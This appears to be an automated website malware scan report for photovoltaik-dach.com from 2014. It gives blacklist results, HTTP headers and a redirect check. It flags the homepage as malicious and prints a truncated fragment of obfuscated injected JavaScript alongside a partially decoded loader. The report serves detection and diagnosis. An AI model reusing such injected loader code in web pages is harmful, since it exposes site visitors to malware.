Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=photovoltaik-dach.com
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://photovoltaik-dach.com/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://photovoltaik-dach.com/ | 200 OK Content-Length: 13621 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below)
d='function $M(file -z ?P L-B="GE <= a ,rt="" Ke ,E=tru & ,r.offset=100 Un L-L @u @y @J LA9 N ,e @q LA9 N Um L-n ],P ]Urg L-k(); .sxml2 X1 A.icrosoft X2 -z=null}}if(! z Ztypeof M!="undefined" -z : M ]+ E= 4}} Uc _> -t[ $o [>,false) Uv _>, =vars Z 4== =vars A= /( % $o), % >)) + t[ % $o) [% >) W} UH L$p, $S A$T= % Yx);regexp :RegExp( Yx+"|"+ $T); H/ Sp 6regexp) Ii=0;i< H/ hj= H/[i] 6"=");if( 4= SS -v G + c G}}}; a.trim _$f Z"qabcdef".indexOf( $o.substr(0,1))>=0){ H
Decoded script:
function kx_M(file){this.kx_z=null;this.kx_P=function(){this.kx_B="GET";this.kx_i="?";this.kx_rx="&";this.kx_r=window;this.kx_rt="";this.kx_b=true;this.kx_w=false;this.kx_E=true;this.kx_rr=null;this.kx_A=null;this.kx_F=file;this.kx_t=new Object();this.kx_C=new Array(2);this.kx_r.offset=100};this.kx_n=function(){this.kx_L=function(){};this.kx_u=function(){};this.kx_y=function(){};this.kx_J=function(){this.runResponse()};this.kx_e=function(){};this.kx_q=function(){this.runResponse()}};thi
Antivirus reports:
http://photovoltaik-dach.com/test404page.js | 404 Not Found Content-Length: 1363 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: photovoltaik-dach.com
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Tue, 05 Aug 2014 08:38:15 GMT
Pragma: no-cache
Server: Apache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: PHPSESSID=7f118f89311477e512138005f9c66937; path=/
X-Powered-By: PHP/4.4.9
Second query (visit from search engine):
GET / HTTP/1.1
Host: photovoltaik-dach.com
Referer: http://www.google.com/search?q=photovoltaik-dach.com
Result:
The result is similar to the first query. There are no suspicious redirects found.